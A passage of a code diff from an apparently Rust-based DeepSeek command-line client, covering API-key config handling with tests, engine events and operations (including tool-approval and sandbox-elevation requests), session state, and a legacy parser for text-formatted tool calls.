||||
|
||||
/// Save an API key to the config file. Creates the file if it doesn't exist.
|
||||
pub fn save_api_key(api_key: &str) -> Result<PathBuf> {
|
||||
fn is_api_key_assignment(line: &str) -> bool {
|
||||
let trimmed = line.trim_start();
|
||||
trimmed
|
||||
.strip_prefix("api_key")
|
||||
.is_some_and(|rest| rest.trim_start().starts_with('='))
|
||||
}
|
||||
|
||||
let config_path = default_config_path()
|
||||
.context("Failed to resolve config path: home directory not found.")?;
|
||||
|
||||
ensure_parent_dir(&config_path)?;
|
||||
|
||||
let content = if config_path.exists() {
|
||||
// Read existing config and update the api_key line
|
||||
let existing = fs::read_to_string(&config_path)?;
|
||||
if existing.contains("api_key") {
|
||||
// Replace existing api_key line
|
||||
let mut result = String::new();
|
||||
for line in existing.lines() {
|
||||
if is_api_key_assignment(line) {
|
||||
let _ = writeln!(result, "api_key = \"{api_key}\"");
|
||||
} else {
|
||||
result.push_str(line);
|
||||
result.push('\n');
|
||||
}
|
||||
}
|
||||
result
|
||||
} else {
|
||||
// Prepend api_key to existing config
|
||||
format!("api_key = \"{api_key}\"\n{existing}")
|
||||
}
|
||||
} else {
|
||||
// Create new minimal config
|
||||
format!(
|
||||
r#"# DeepSeek CLI Configuration
|
||||
# Get your API key from https://platform.deepseek.com
|
||||
|
||||
api_key = "{api_key}"
|
||||
|
||||
# Base URL (default: https://api.deepseek.com)
|
||||
# base_url = "https://api.deepseek.com"
|
||||
|
||||
# Default model
|
||||
default_text_model = "deepseek-reasoner"
|
||||
"#
|
||||
)
|
||||
};
|
||||
|
||||
fs::write(&config_path, content)
|
||||
.with_context(|| format!("Failed to write config to {}", config_path.display()))?;
|
||||
|
||||
Ok(config_path)
|
||||
}
|
||||
|
||||
/// Check if an API key is configured (either in config or environment)
|
||||
pub fn has_api_key(config: &Config) -> bool {
|
||||
config.api_key.is_some()
|
||||
}
|
||||
|
||||
/// Clear the API key from the config file
|
||||
pub fn clear_api_key() -> Result<()> {
|
||||
let config_path = default_config_path()
|
||||
.context("Failed to resolve config path: home directory not found.")?;
|
||||
|
||||
if !config_path.exists() {
|
||||
return Ok(());
|
||||
}
|
||||
|
||||
let existing = fs::read_to_string(&config_path)?;
|
||||
let mut result = String::new();
|
||||
|
||||
for line in existing.lines() {
|
||||
if !line.trim_start().starts_with("api_key") {
|
||||
result.push_str(line);
|
||||
result.push('\n');
|
||||
}
|
||||
}
|
||||
|
||||
fs::write(&config_path, result)
|
||||
.with_context(|| format!("Failed to write config to {}", config_path.display()))?;
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
use std::collections::HashMap;
|
||||
use std::env;
|
||||
use std::ffi::OsString;
|
||||
use std::sync::{Mutex, OnceLock};
|
||||
use std::time::{SystemTime, UNIX_EPOCH};
|
||||
|
||||
struct EnvGuard {
|
||||
home: Option<OsString>,
|
||||
userprofile: Option<OsString>,
|
||||
deepseek_config_path: Option<OsString>,
|
||||
}
|
||||
|
||||
impl EnvGuard {
|
||||
fn new(home: &Path) -> Self {
|
||||
let home_str = OsString::from(home.as_os_str());
|
||||
let config_path = home.join(".deepseek").join("config.toml");
|
||||
let config_str = OsString::from(config_path.as_os_str());
|
||||
let home_prev = env::var_os("HOME");
|
||||
let userprofile_prev = env::var_os("USERPROFILE");
|
||||
let deepseek_config_prev = env::var_os("DEEPSEEK_CONFIG_PATH");
|
||||
// Safety: test-only environment mutation guarded by a global mutex.
|
||||
unsafe {
|
||||
env::set_var("HOME", &home_str);
|
||||
env::set_var("USERPROFILE", &home_str);
|
||||
env::set_var("DEEPSEEK_CONFIG_PATH", &config_str);
|
||||
}
|
||||
Self {
|
||||
home: home_prev,
|
||||
userprofile: userprofile_prev,
|
||||
deepseek_config_path: deepseek_config_prev,
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
impl Drop for EnvGuard {
|
||||
fn drop(&mut self) {
|
||||
if let Some(value) = self.home.take() {
|
||||
// Safety: test-only environment mutation guarded by a global mutex.
|
||||
unsafe {
|
||||
env::set_var("HOME", value);
|
||||
}
|
||||
} else {
|
||||
// Safety: test-only environment mutation guarded by a global mutex.
|
||||
unsafe {
|
||||
env::remove_var("HOME");
|
||||
}
|
||||
}
|
||||
if let Some(value) = self.userprofile.take() {
|
||||
// Safety: test-only environment mutation guarded by a global mutex.
|
||||
unsafe {
|
||||
env::set_var("USERPROFILE", value);
|
||||
}
|
||||
} else {
|
||||
// Safety: test-only environment mutation guarded by a global mutex.
|
||||
unsafe {
|
||||
env::remove_var("USERPROFILE");
|
||||
}
|
||||
}
|
||||
if let Some(value) = self.deepseek_config_path.take() {
|
||||
// Safety: test-only environment mutation guarded by a global mutex.
|
||||
unsafe {
|
||||
env::set_var("DEEPSEEK_CONFIG_PATH", value);
|
||||
}
|
||||
} else {
|
||||
// Safety: test-only environment mutation guarded by a global mutex.
|
||||
unsafe {
|
||||
env::remove_var("DEEPSEEK_CONFIG_PATH");
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
fn env_lock() -> &'static Mutex<()> {
|
||||
static LOCK: OnceLock<Mutex<()>> = OnceLock::new();
|
||||
LOCK.get_or_init(|| Mutex::new(()))
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn save_api_key_writes_config() -> Result<()> {
|
||||
let _lock = env_lock().lock().unwrap();
|
||||
let nanos = SystemTime::now()
|
||||
.duration_since(UNIX_EPOCH)
|
||||
.unwrap()
|
||||
.as_nanos();
|
||||
let temp_root = env::temp_dir().join(format!(
|
||||
"deepseek-cli-test-{}-{}",
|
||||
std::process::id(),
|
||||
nanos
|
||||
));
|
||||
fs::create_dir_all(&temp_root)?;
|
||||
let _guard = EnvGuard::new(&temp_root);
|
||||
|
||||
let path = save_api_key("test-key")?;
|
||||
let expected = temp_root.join(".deepseek").join("config.toml");
|
||||
assert_eq!(path, expected);
|
||||
|
||||
let contents = fs::read_to_string(&path)?;
|
||||
assert!(contents.contains("api_key = \"test-key\""));
|
||||
Ok(())
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_tilde_expansion_in_paths() -> Result<()> {
|
||||
let _lock = env_lock().lock().unwrap();
|
||||
let nanos = SystemTime::now()
|
||||
.duration_since(UNIX_EPOCH)
|
||||
.unwrap()
|
||||
.as_nanos();
|
||||
let temp_root = env::temp_dir().join(format!(
|
||||
"deepseek-cli-tilde-test-{}-{}",
|
||||
std::process::id(),
|
||||
nanos
|
||||
));
|
||||
fs::create_dir_all(&temp_root)?;
|
||||
let _guard = EnvGuard::new(&temp_root);
|
||||
|
||||
let config = Config {
|
||||
skills_dir: Some("~/.deepseek/skills".to_string()),
|
||||
..Default::default()
|
||||
};
|
||||
let expected_home = dirs::home_dir().expect("home dir not found");
|
||||
let expected_skills = expected_home.join(".deepseek").join("skills");
|
||||
let actual_skills = config.skills_dir();
|
||||
assert_eq!(
|
||||
actual_skills.components().collect::<Vec<_>>(),
|
||||
expected_skills.components().collect::<Vec<_>>()
|
||||
);
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_nonexistent_profile_error() {
|
||||
let mut profiles = HashMap::new();
|
||||
profiles.insert("work".to_string(), Config::default());
|
||||
let config = ConfigFile {
|
||||
base: Config::default(),
|
||||
profiles: Some(profiles),
|
||||
};
|
||||
|
||||
let err = apply_profile(config, Some("nonexistent")).unwrap_err();
|
||||
let message = err.to_string();
|
||||
assert!(message.contains("Profile 'nonexistent' not found"));
|
||||
assert!(message.contains("Available profiles"));
|
||||
assert!(message.contains("work"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_profile_with_no_profiles_section() {
|
||||
let config = ConfigFile {
|
||||
base: Config::default(),
|
||||
profiles: None,
|
||||
};
|
||||
|
||||
let err = apply_profile(config, Some("missing")).unwrap_err();
|
||||
assert!(err.to_string().contains("Available profiles: none"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_save_api_key_doesnt_match_similar_keys() -> Result<()> {
|
||||
let _lock = env_lock().lock().unwrap();
|
||||
let nanos = SystemTime::now()
|
||||
.duration_since(UNIX_EPOCH)
|
||||
.unwrap()
|
||||
.as_nanos();
|
||||
let temp_root = env::temp_dir().join(format!(
|
||||
"deepseek-cli-api-key-test-{}-{}",
|
||||
std::process::id(),
|
||||
nanos
|
||||
));
|
||||
fs::create_dir_all(&temp_root)?;
|
||||
let _guard = EnvGuard::new(&temp_root);
|
||||
|
||||
let config_path = temp_root.join(".deepseek").join("config.toml");
|
||||
ensure_parent_dir(&config_path)?;
|
||||
fs::write(
|
||||
&config_path,
|
||||
"api_key_backup = \"old\"\napi_key = \"current\"\n",
|
||||
)?;
|
||||
|
||||
let path = save_api_key("new-key")?;
|
||||
assert_eq!(path, config_path);
|
||||
|
||||
let contents = fs::read_to_string(&config_path)?;
|
||||
assert!(contents.contains("api_key_backup = \"old\""));
|
||||
assert!(contents.contains("api_key = \"new-key\""));
|
||||
Ok(())
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_empty_api_key_rejected() {
|
||||
let config = Config {
|
||||
api_key: Some(" ".to_string()),
|
||||
..Default::default()
|
||||
};
|
||||
assert!(config.validate().is_err());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_missing_api_key_allowed() -> Result<()> {
|
||||
let config = Config::default();
|
||||
config.validate()?;
|
||||
Ok(())
|
||||
}
|
||||
}
|
||||
+1520
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,118 @@
|
||||
//! Events emitted by the core engine to the UI.
|
||||
//!
|
||||
//! These events flow from the engine to the TUI via a channel,
|
||||
//! enabling non-blocking, real-time updates.
|
||||
|
||||
use serde_json::Value;
|
||||
|
||||
use crate::models::Usage;
|
||||
use crate::tools::spec::{ToolError, ToolResult};
|
||||
use crate::tools::subagent::SubAgentResult;
|
||||
|
||||
/// Events emitted by the engine to update the UI.
|
||||
#[derive(Debug, Clone)]
|
||||
pub enum Event {
|
||||
// === Streaming Events ===
|
||||
/// A new message block has started
|
||||
MessageStarted { index: usize },
|
||||
|
||||
/// Incremental text content delta
|
||||
MessageDelta { index: usize, content: String },
|
||||
|
||||
/// Message block completed
|
||||
MessageComplete { index: usize },
|
||||
|
||||
/// Thinking block started
|
||||
ThinkingStarted { index: usize },
|
||||
|
||||
/// Incremental thinking content delta
|
||||
ThinkingDelta { index: usize, content: String },
|
||||
|
||||
/// Thinking block completed
|
||||
ThinkingComplete { index: usize },
|
||||
|
||||
// === Tool Events ===
|
||||
/// Tool call initiated
|
||||
ToolCallStarted {
|
||||
id: String,
|
||||
name: String,
|
||||
input: Value,
|
||||
},
|
||||
|
||||
/// Tool execution progress (for long-running tools)
|
||||
ToolCallProgress { id: String, output: String },
|
||||
|
||||
/// Tool call completed
|
||||
ToolCallComplete {
|
||||
id: String,
|
||||
name: String,
|
||||
result: Result<ToolResult, ToolError>,
|
||||
},
|
||||
|
||||
// === Turn Lifecycle ===
|
||||
/// A new turn has started (user sent a message)
|
||||
TurnStarted,
|
||||
|
||||
/// The turn is complete (no more tool calls)
|
||||
TurnComplete { usage: Usage },
|
||||
|
||||
// === Sub-Agent Events (for RLM mode) ===
|
||||
/// A sub-agent has been spawned
|
||||
AgentSpawned { id: String, prompt: String },
|
||||
|
||||
/// Sub-agent progress update
|
||||
AgentProgress { id: String, status: String },
|
||||
|
||||
/// Sub-agent completed
|
||||
AgentComplete { id: String, result: String },
|
||||
|
||||
/// Sub-agent listing
|
||||
AgentList { agents: Vec<SubAgentResult> },
|
||||
|
||||
// === System Events ===
|
||||
/// An error occurred
|
||||
Error { message: String, recoverable: bool },
|
||||
|
||||
/// Status message for UI display
|
||||
Status { message: String },
|
||||
|
||||
/// Pause terminal input events (for interactive subprocesses)
|
||||
PauseEvents,
|
||||
|
||||
/// Resume terminal input events after subprocess completion
|
||||
ResumeEvents,
|
||||
|
||||
/// Request user approval for a tool call
|
||||
ApprovalRequired {
|
||||
id: String,
|
||||
tool_name: String,
|
||||
description: String,
|
||||
},
|
||||
|
||||
/// Request user decision after sandbox denial
|
||||
ElevationRequired {
|
||||
tool_id: String,
|
||||
tool_name: String,
|
||||
command: Option<String>,
|
||||
denial_reason: String,
|
||||
blocked_network: bool,
|
||||
blocked_write: bool,
|
||||
},
|
||||
}
|
||||
|
||||
impl Event {
|
||||
/// Create a new error event
|
||||
pub fn error(message: impl Into<String>, recoverable: bool) -> Self {
|
||||
Event::Error {
|
||||
message: message.into(),
|
||||
recoverable,
|
||||
}
|
||||
}
|
||||
|
||||
/// Create a new status event
|
||||
pub fn status(message: impl Into<String>) -> Self {
|
||||
Event::Status {
|
||||
message: message.into(),
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,21 @@
|
||||
//! Core engine module for `DeepSeek` CLI.
|
||||
//!
|
||||
//! This module provides the event-driven architecture that separates
|
||||
//! the UI from the AI interaction logic:
|
||||
//!
|
||||
//! - `engine`: The main engine that processes operations
|
||||
//! - `events`: Events emitted by the engine to the UI
|
||||
//! - `ops`: Operations submitted by the UI to the engine
|
||||
//! - `session`: Session state management
|
||||
//! - `turn`: Turn context and tracking
|
||||
|
||||
#![allow(dead_code)]
|
||||
|
||||
pub mod engine;
|
||||
pub mod events;
|
||||
pub mod ops;
|
||||
pub mod session;
|
||||
pub mod tool_parser;
|
||||
pub mod turn;
|
||||
|
||||
// Re-exports
|
||||
@@ -0,0 +1,81 @@
|
||||
//! Operations submitted by the UI to the core engine.
|
||||
//!
|
||||
//! These operations flow from the TUI to the engine via a channel,
|
||||
//! allowing the UI to remain responsive while the engine processes requests.
|
||||
|
||||
use crate::compaction::CompactionConfig;
|
||||
use crate::models::{Message, SystemPrompt};
|
||||
use crate::tui::app::AppMode;
|
||||
use std::path::PathBuf;
|
||||
|
||||
/// Operations that can be submitted to the engine.
|
||||
#[derive(Debug, Clone)]
|
||||
pub enum Op {
|
||||
/// Send a message to the AI
|
||||
SendMessage {
|
||||
content: String,
|
||||
mode: AppMode,
|
||||
model: String,
|
||||
allow_shell: bool,
|
||||
trust_mode: bool,
|
||||
},
|
||||
|
||||
/// Cancel the current request
|
||||
CancelRequest,
|
||||
|
||||
/// Approve a tool call that requires permission
|
||||
ApproveToolCall { id: String },
|
||||
|
||||
/// Deny a tool call that requires permission
|
||||
DenyToolCall { id: String },
|
||||
|
||||
/// Spawn a sub-agent (for RLM mode)
|
||||
SpawnSubAgent { prompt: String },
|
||||
|
||||
/// List current sub-agents and their status
|
||||
ListSubAgents,
|
||||
|
||||
/// Change the operating mode
|
||||
ChangeMode { mode: AppMode },
|
||||
|
||||
/// Update the model being used
|
||||
SetModel { model: String },
|
||||
|
||||
/// Update auto-compaction settings
|
||||
SetCompaction { config: CompactionConfig },
|
||||
|
||||
/// Sync engine session state (used for resume/load)
|
||||
SyncSession {
|
||||
messages: Vec<Message>,
|
||||
system_prompt: Option<SystemPrompt>,
|
||||
model: String,
|
||||
workspace: PathBuf,
|
||||
},
|
||||
|
||||
/// Shutdown the engine
|
||||
Shutdown,
|
||||
}
|
||||
|
||||
impl Op {
|
||||
/// Create a send message operation
|
||||
pub fn send(
|
||||
content: impl Into<String>,
|
||||
mode: AppMode,
|
||||
model: impl Into<String>,
|
||||
allow_shell: bool,
|
||||
trust_mode: bool,
|
||||
) -> Self {
|
||||
Op::SendMessage {
|
||||
content: content.into(),
|
||||
mode,
|
||||
model: model.into(),
|
||||
allow_shell,
|
||||
trust_mode,
|
||||
}
|
||||
}
|
||||
|
||||
/// Create a cancel operation
|
||||
pub fn cancel() -> Self {
|
||||
Op::CancelRequest
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,123 @@
|
||||
//! Session state management for the core engine.
|
||||
//!
|
||||
//! Tracks conversation history, token usage, and session metadata.
|
||||
|
||||
use crate::models::{Message, SystemPrompt, Usage};
|
||||
use crate::project_context::{ProjectContext, load_project_context_with_parents};
|
||||
use std::path::PathBuf;
|
||||
|
||||
/// Session state for the engine.
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct Session {
|
||||
/// Model being used
|
||||
pub model: String,
|
||||
|
||||
/// Workspace directory
|
||||
pub workspace: PathBuf,
|
||||
|
||||
/// System prompt (optional)
|
||||
pub system_prompt: Option<SystemPrompt>,
|
||||
|
||||
/// Conversation history (API format)
|
||||
pub messages: Vec<Message>,
|
||||
|
||||
/// Total tokens used in this session
|
||||
pub total_usage: SessionUsage,
|
||||
|
||||
/// Whether shell execution is allowed
|
||||
pub allow_shell: bool,
|
||||
|
||||
/// Whether to trust paths outside workspace
|
||||
pub trust_mode: bool,
|
||||
|
||||
/// Notes file path
|
||||
pub notes_path: PathBuf,
|
||||
|
||||
/// MCP config path
|
||||
pub mcp_config_path: PathBuf,
|
||||
|
||||
/// Session ID (for tracking)
|
||||
pub id: String,
|
||||
|
||||
/// Project context loaded from AGENTS.md, etc.
|
||||
pub project_context: Option<ProjectContext>,
|
||||
}
|
||||
|
||||
/// Cumulative usage statistics for a session.
|
||||
#[derive(Debug, Clone, Default)]
|
||||
#[allow(clippy::struct_field_names)]
|
||||
pub struct SessionUsage {
|
||||
pub input_tokens: u64,
|
||||
pub output_tokens: u64,
|
||||
pub cache_creation_input_tokens: u64,
|
||||
pub cache_read_input_tokens: u64,
|
||||
}
|
||||
|
||||
impl SessionUsage {
|
||||
/// Add usage from a turn
|
||||
pub fn add(&mut self, usage: &Usage) {
|
||||
self.input_tokens += u64::from(usage.input_tokens);
|
||||
self.output_tokens += u64::from(usage.output_tokens);
|
||||
}
|
||||
|
||||
/// Total tokens used
|
||||
pub fn total(&self) -> u64 {
|
||||
self.input_tokens + self.output_tokens
|
||||
}
|
||||
}
|
||||
|
||||
impl Session {
|
||||
/// Create a new session
|
||||
pub fn new(
|
||||
model: String,
|
||||
workspace: PathBuf,
|
||||
allow_shell: bool,
|
||||
trust_mode: bool,
|
||||
notes_path: PathBuf,
|
||||
mcp_config_path: PathBuf,
|
||||
) -> Self {
|
||||
// Load project context from AGENTS.md, CLAUDE.md, etc.
|
||||
let project_context = load_project_context_with_parents(&workspace);
|
||||
let has_context = project_context.has_instructions();
|
||||
|
||||
Self {
|
||||
model,
|
||||
workspace,
|
||||
system_prompt: None,
|
||||
messages: Vec::new(),
|
||||
total_usage: SessionUsage::default(),
|
||||
allow_shell,
|
||||
trust_mode,
|
||||
notes_path,
|
||||
mcp_config_path,
|
||||
id: uuid::Uuid::new_v4().to_string(),
|
||||
project_context: if has_context {
|
||||
Some(project_context)
|
||||
} else {
|
||||
None
|
||||
},
|
||||
}
|
||||
}
|
||||
|
||||
/// Get project instructions as a system prompt block (if available)
|
||||
pub fn get_project_instructions(&self) -> Option<String> {
|
||||
self.project_context
|
||||
.as_ref()
|
||||
.and_then(super::super::project_context::ProjectContext::as_system_block)
|
||||
}
|
||||
|
||||
/// Add a message to the conversation
|
||||
pub fn add_message(&mut self, message: Message) {
|
||||
self.messages.push(message);
|
||||
}
|
||||
|
||||
/// Clear the conversation history
|
||||
pub fn clear(&mut self) {
|
||||
self.messages.clear();
|
||||
}
|
||||
|
||||
/// Get the message count
|
||||
pub fn message_count(&self) -> usize {
|
||||
self.messages.len()
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,574 @@
|
||||
//! Legacy parser for text-based tool calls from DeepSeek models.
|
||||
//!
|
||||
//! Structured tool-call items are preferred, so the engine no longer invokes
|
||||
//! this parser. It is kept for reference/debugging.
|
||||
//!
|
||||
//! Some DeepSeek outputs tool calls as text in various formats:
|
||||
//! ```text
|
||||
//! [TOOL_CALL]
|
||||
//! {tool => "tool_name", args => {...}}
|
||||
//! [/TOOL_CALL]
|
||||
//! ```
|
||||
//!
|
||||
//! Or XML-style format:
|
||||
//! ```text
|
||||
//! <deepseek:tool_call>
|
||||
//! <invoke name="tool_name">
|
||||
//! <parameter name="arg">value</parameter>
|
||||
//! </invoke>
|
||||
//! </deepseek:tool_call>
|
||||
//! ```
|
||||
//!
|
||||
//! This module parses these text patterns into structured tool calls.
|
||||
|
||||
use regex::Regex;
|
||||
use serde_json::{Value, json};
|
||||
use std::sync::OnceLock;
|
||||
|
||||
/// A parsed tool call from text content.
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct ParsedToolCall {
|
||||
/// Tool name
|
||||
pub name: String,
|
||||
/// Tool arguments as JSON
|
||||
pub args: Value,
|
||||
/// Generated ID for the tool call
|
||||
pub id: String,
|
||||
}
|
||||
|
||||
/// Result of parsing text for tool calls.
|
||||
#[derive(Debug)]
|
||||
pub struct ParseResult {
|
||||
/// The text with tool call markers removed (for display)
|
||||
pub clean_text: String,
|
||||
/// Parsed tool calls found in the text
|
||||
pub tool_calls: Vec<ParsedToolCall>,
|
||||
}
|
||||
|
||||
static TOOL_CALL_REGEX: OnceLock<Regex> = OnceLock::new();
|
||||
static XML_TOOL_CALL_REGEX: OnceLock<Regex> = OnceLock::new();
|
||||
static INVOKE_REGEX: OnceLock<Regex> = OnceLock::new();
|
||||
static THINKING_REGEX: OnceLock<Regex> = OnceLock::new();
|
||||
|
||||
fn get_tool_call_regex() -> &'static Regex {
|
||||
TOOL_CALL_REGEX.get_or_init(|| {
|
||||
// Match [TOOL_CALL] ... [/TOOL_CALL] blocks
|
||||
Regex::new(r"(?s)\[TOOL_CALL\]\s*(.*?)\s*\[/TOOL_CALL\]").unwrap()
|
||||
})
|
||||
}
|
||||
|
||||
fn get_xml_tool_call_regex() -> &'static Regex {
|
||||
XML_TOOL_CALL_REGEX.get_or_init(|| {
|
||||
// Match <deepseek:tool_call>...</deepseek:tool_call> or similar XML patterns
|
||||
Regex::new(r"(?s)<(?:deepseek:)?tool_call[^>]*>\s*(.*?)\s*</(?:deepseek:)?tool_call>")
|
||||
.unwrap()
|
||||
})
|
||||
}
|
||||
|
||||
fn get_invoke_regex() -> &'static Regex {
|
||||
INVOKE_REGEX.get_or_init(|| {
|
||||
// Match <invoke name="tool_name">...</invoke> patterns
|
||||
Regex::new(r#"(?s)<invoke\s+name\s*=\s*"([^"]+)"[^>]*>(.*?)</invoke>"#).unwrap()
|
||||
})
|
||||
}
|
||||
|
||||
fn get_thinking_regex() -> &'static Regex {
|
||||
THINKING_REGEX.get_or_init(|| {
|
||||
// Match thinking blocks including partial closing tags
|
||||
Regex::new(r"(?s)</?(?:think|thinking)[^>]*>").unwrap()
|
||||
})
|
||||
}
|
||||
|
||||
/// Parse tool calls from text content.
|
||||
/// Returns the clean text (with markers removed) and any parsed tool calls.
|
||||
pub fn parse_tool_calls(text: &str) -> ParseResult {
|
||||
let mut tool_calls = Vec::new();
|
||||
let mut clean_text = text.to_string();
|
||||
let mut id_counter = 0;
|
||||
|
||||
// First, remove thinking tags
|
||||
let thinking_regex = get_thinking_regex();
|
||||
clean_text = thinking_regex.replace_all(&clean_text, "").to_string();
|
||||
|
||||
// Parse [TOOL_CALL] format
|
||||
let regex = get_tool_call_regex();
|
||||
for cap in regex.captures_iter(text) {
|
||||
let (Some(full_match), Some(inner)) = (cap.get(0), cap.get(1)) else {
|
||||
continue;
|
||||
};
|
||||
let full_match = full_match.as_str();
|
||||
let inner = inner.as_str().trim();
|
||||
|
||||
if let Some(parsed) = parse_tool_call_inner(inner, &mut id_counter) {
|
||||
tool_calls.push(parsed);
|
||||
}
|
||||
|
||||
clean_text = clean_text.replace(full_match, "");
|
||||
}
|
||||
|
||||
// Parse XML-style <deepseek:tool_call> or <tool_call> format
|
||||
let xml_regex = get_xml_tool_call_regex();
|
||||
for cap in xml_regex.captures_iter(text) {
|
||||
let (Some(full_match), Some(inner)) = (cap.get(0), cap.get(1)) else {
|
||||
continue;
|
||||
};
|
||||
let full_match = full_match.as_str();
|
||||
let inner = inner.as_str().trim();
|
||||
|
||||
// Parse invoke blocks inside
|
||||
if let Some(parsed) = parse_invoke_block(inner, &mut id_counter) {
|
||||
tool_calls.push(parsed);
|
||||
} else if let Some(parsed) = parse_tool_call_inner(inner, &mut id_counter) {
|
||||
tool_calls.push(parsed);
|
||||
}
|
||||
|
||||
clean_text = clean_text.replace(full_match, "");
|
||||
}
|
||||
|
||||
// Also parse standalone <invoke> blocks that might not be wrapped
|
||||
let invoke_regex = get_invoke_regex();
|
||||
for cap in invoke_regex.captures_iter(&clean_text.clone()) {
|
||||
let (Some(full_match), Some(tool_name), Some(inner)) = (cap.get(0), cap.get(1), cap.get(2))
|
||||
else {
|
||||
continue;
|
||||
};
|
||||
let full_match = full_match.as_str();
|
||||
let tool_name = tool_name.as_str();
|
||||
let inner = inner.as_str();
|
||||
|
||||
let args = parse_xml_parameters(inner);
|
||||
id_counter += 1;
|
||||
tool_calls.push(ParsedToolCall {
|
||||
name: tool_name.to_string(),
|
||||
args,
|
||||
id: format!("xml_tool_{id_counter}"),
|
||||
});
|
||||
|
||||
clean_text = clean_text.replace(full_match, "");
|
||||
}
|
||||
|
||||
// Clean up extra whitespace and empty lines
|
||||
clean_text = clean_text
|
||||
.lines()
|
||||
.filter(|line| !line.trim().is_empty())
|
||||
.collect::<Vec<_>>()
|
||||
.join("\n")
|
||||
.trim()
|
||||
.to_string();
|
||||
|
||||
ParseResult {
|
||||
clean_text,
|
||||
tool_calls,
|
||||
}
|
||||
}
|
||||
|
||||
/// Parse an `<invoke>` block into a tool call.
|
||||
fn parse_invoke_block(content: &str, id_counter: &mut u32) -> Option<ParsedToolCall> {
|
||||
let invoke_regex = get_invoke_regex();
|
||||
let cap = invoke_regex.captures(content)?;
|
||||
|
||||
let tool_name = cap.get(1)?.as_str();
|
||||
let inner = cap.get(2)?.as_str();
|
||||
|
||||
let args = parse_xml_parameters(inner);
|
||||
|
||||
*id_counter += 1;
|
||||
Some(ParsedToolCall {
|
||||
name: tool_name.to_string(),
|
||||
args,
|
||||
id: format!("xml_tool_{id_counter}"),
|
||||
})
|
||||
}
|
||||
|
||||
/// Parse XML-style parameters like <parameter name="foo">value</parameter>
|
||||
fn parse_xml_parameters(content: &str) -> Value {
|
||||
let param_regex = Regex::new(
|
||||
"<(?:parameter|param)\\s+name\\s*=\\s*\"([^\"]+)\"[^>]*>(.*?)</(?:parameter|param)>",
|
||||
)
|
||||
.ok();
|
||||
let simple_tag_regex =
|
||||
Regex::new("<([a-zA-Z_][a-zA-Z0-9_]*)>(.*?)</([a-zA-Z_][a-zA-Z0-9_]*)>").ok();
|
||||
|
||||
let mut map = serde_json::Map::new();
|
||||
|
||||
// Try parsing <parameter name="...">value</parameter>
|
||||
if let Some(regex) = param_regex {
|
||||
for cap in regex.captures_iter(content) {
|
||||
if let (Some(name), Some(value)) = (cap.get(1), cap.get(2)) {
|
||||
let name_str = name.as_str();
|
||||
let value_str = value.as_str().trim();
|
||||
|
||||
// Try to parse as JSON, otherwise use as string
|
||||
let json_value = serde_json::from_str(value_str)
|
||||
.unwrap_or_else(|_| Value::String(value_str.to_string()));
|
||||
map.insert(name_str.to_string(), json_value);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Also try parsing <tagname>value</tagname> format
|
||||
if let Some(regex) = simple_tag_regex {
|
||||
for cap in regex.captures_iter(content) {
|
||||
if let (Some(name), Some(value), Some(close)) = (cap.get(1), cap.get(2), cap.get(3)) {
|
||||
if name.as_str() != close.as_str() {
|
||||
continue;
|
||||
}
|
||||
let name_str = name.as_str();
|
||||
// Skip known wrapper tags
|
||||
if ["invoke", "tool_call", "parameter", "param"].contains(&name_str) {
|
||||
continue;
|
||||
}
|
||||
let value_str = value.as_str().trim();
|
||||
if !map.contains_key(name_str) {
|
||||
let json_value = serde_json::from_str(value_str)
|
||||
.unwrap_or_else(|_| Value::String(value_str.to_string()));
|
||||
map.insert(name_str.to_string(), json_value);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
Value::Object(map)
|
||||
}
|
||||
|
||||
/// Parse the inner content of a `TOOL_CALL` block.
|
||||
fn parse_tool_call_inner(inner: &str, id_counter: &mut u32) -> Option<ParsedToolCall> {
|
||||
// Try to parse as JSON first
|
||||
if let Ok(json) = serde_json::from_str::<Value>(inner) {
|
||||
return parse_from_json(&json, id_counter);
|
||||
}
|
||||
|
||||
// Try the arrow syntax: {tool => "name", args => {...}}
|
||||
if let Some(parsed) = parse_arrow_syntax(inner, id_counter) {
|
||||
return Some(parsed);
|
||||
}
|
||||
|
||||
// Try to extract tool name and args from any format
|
||||
parse_flexible_format(inner, id_counter)
|
||||
}
|
||||
|
||||
/// Parse from JSON object.
|
||||
fn parse_from_json(json: &Value, id_counter: &mut u32) -> Option<ParsedToolCall> {
|
||||
let obj = json.as_object()?;
|
||||
|
||||
// Try different field names for the tool name
|
||||
let name = obj
|
||||
.get("tool")
|
||||
.or_else(|| obj.get("name"))
|
||||
.or_else(|| obj.get("function"))
|
||||
.and_then(|v| v.as_str())?
|
||||
.to_string();
|
||||
|
||||
// Try different field names for the arguments
|
||||
let args = obj
|
||||
.get("args")
|
||||
.or_else(|| obj.get("arguments"))
|
||||
.or_else(|| obj.get("input"))
|
||||
.or_else(|| obj.get("parameters"))
|
||||
.cloned()
|
||||
.unwrap_or(json!({}));
|
||||
|
||||
*id_counter += 1;
|
||||
Some(ParsedToolCall {
|
||||
name,
|
||||
args,
|
||||
id: format!("text_tool_{id_counter}"),
|
||||
})
|
||||
}
|
||||
|
||||
/// Parse the arrow syntax: {tool => "name", args => {...}}
|
||||
fn parse_arrow_syntax(inner: &str, id_counter: &mut u32) -> Option<ParsedToolCall> {
|
||||
// Extract tool name
|
||||
let tool_regex = Regex::new(r#"tool\s*=>\s*"([^"]+)""#).ok()?;
|
||||
let name = tool_regex.captures(inner)?.get(1)?.as_str().to_string();
|
||||
|
||||
// Extract args - try to find the JSON object after "args =>"
|
||||
